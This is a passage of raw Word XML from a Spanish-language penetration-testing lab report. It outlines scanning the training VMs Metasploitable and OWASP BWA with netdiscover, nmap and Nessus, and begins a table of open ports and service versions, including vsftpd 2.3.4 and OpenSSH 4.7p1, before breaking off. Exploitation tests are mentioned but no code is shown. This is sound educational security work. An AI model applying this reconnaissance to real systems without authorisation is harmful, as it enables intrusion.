          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DD8DE3" w14:textId="197C38E7" w:rsidR="00CC2E17" w:rsidRDefault="00CC2E17" w:rsidP="00CC2E17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Realizamos un escaneo a cada una de las maquinas con </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8559C">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidR="008D3109">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> para obtener información como servicios y puertos activos de cada maquina y </w:t>
      </w:r>
      <w:r w:rsidR="00C8559C">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>vulnerabilidades</w:t>
      </w:r>
      <w:r w:rsidR="008D3109">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> asociadas a los servicios</w:t>
      </w:r>
      <w:r w:rsidR="00363A97">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, se </w:t>
      </w:r>
      <w:r w:rsidR="009E267E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>utilizó</w:t>
      </w:r>
      <w:r w:rsidR="00363A97">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> la herramienta Nessus para confirmar y dar resultados visuales de la cantidad de vulnerabilidades identificadas en cada </w:t>
      </w:r>
      <w:r w:rsidR="0058651B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>máquina</w:t>
      </w:r>
      <w:r w:rsidR="00363A97">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9851FC" w14:textId="3BBE7631" w:rsidR="008D3109" w:rsidRPr="00CC2E17" w:rsidRDefault="00C33FA4" w:rsidP="008D3109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C33FA4">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Se hizo pruebas de explotación para confirmar la existencia de las vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFB419E" w14:textId="77777777" w:rsidR="00CC2E17" w:rsidRPr="00CC2E17" w:rsidRDefault="00CC2E17" w:rsidP="00CC2E17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2E17">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Recopilación de recomendaciones para orientar en la solución de vulnerabilidades. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B112FA1" w14:textId="76027456" w:rsidR="00CC2E17" w:rsidRDefault="00CC2E17" w:rsidP="00CC2E17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2E17">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Redacción del informe de resultados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC9DDD" w14:textId="6B5B128B" w:rsidR="008D3109" w:rsidRDefault="008D3109" w:rsidP="008D3109">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1001A7" w14:textId="113C14DA" w:rsidR="008D3109" w:rsidRDefault="008D3109" w:rsidP="008D3109">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Georgia" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>EVIDENCIAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8E18B6" w14:textId="2A67F0A9" w:rsidR="00CC2E17" w:rsidRDefault="00DB3A8F" w:rsidP="00D85A35">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Se realizo un escaneo para identificar las vulnerabilidades de las computadoras (metasplotaible y owaspbw</w:t>
      </w:r>
      <w:r w:rsidR="000F0E63">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>) los cuales se encontraron los siguientes resultados</w:t>
      </w:r>
      <w:r w:rsidR="002B14D2">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> con nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328305C" w14:textId="0D37E2C5" w:rsidR="005F2B55" w:rsidRDefault="00F71DFE" w:rsidP="00F71DFE">
      <w:pPr>
        <w:pStyle w:val="Tablas"/>
      </w:pPr>
      <w:r w:rsidRPr="000A77CB">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Puertos y Servicios Abiertos</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="70" w:type="dxa"/>
          <w:right w:w="70" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1413"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="425"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="3686"/>
        <w:gridCol w:w="1036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00837B5A" w:rsidRPr="00837B5A" w14:paraId="2AD73672" w14:textId="77777777" w:rsidTr="007B59D0">
        <w:trPr>
          <w:trHeight w:val="315"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413"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7615CB4" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>HOST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="8EA9DB"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D2E5A5A" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>PUERTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="8EA9DB"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="064D1D4B" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>SERVICIO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="8EA9DB"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57697D9E" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>VERSION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="8EA9DB"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0504F928" w14:textId="161F9B71" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>S.O</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00837B5A" w:rsidRPr="00837B5A" w14:paraId="7C3D24BA" w14:textId="77777777" w:rsidTr="001E62FF">
        <w:trPr>
          <w:trHeight w:val="315"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D506EC2" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="113" w:right="113"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>metasploitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31B5DCEC"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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28E91869"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115A4359"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ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ED66095" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11441743" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>LINUX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00837B5A" w:rsidRPr="00837B5A" w14:paraId="2E3E5F3B"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50B6E709"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13CA1AAA"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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B6DAFCB"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49FDD5E3"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ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A0348D2" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>OpenSSH 4.7p1 Debian 8ubuntu1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B0D7495" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00837B5A" w:rsidRPr="00837B5A" w14:paraId="7A2EFE23"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29D831E0"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65FE373D"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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
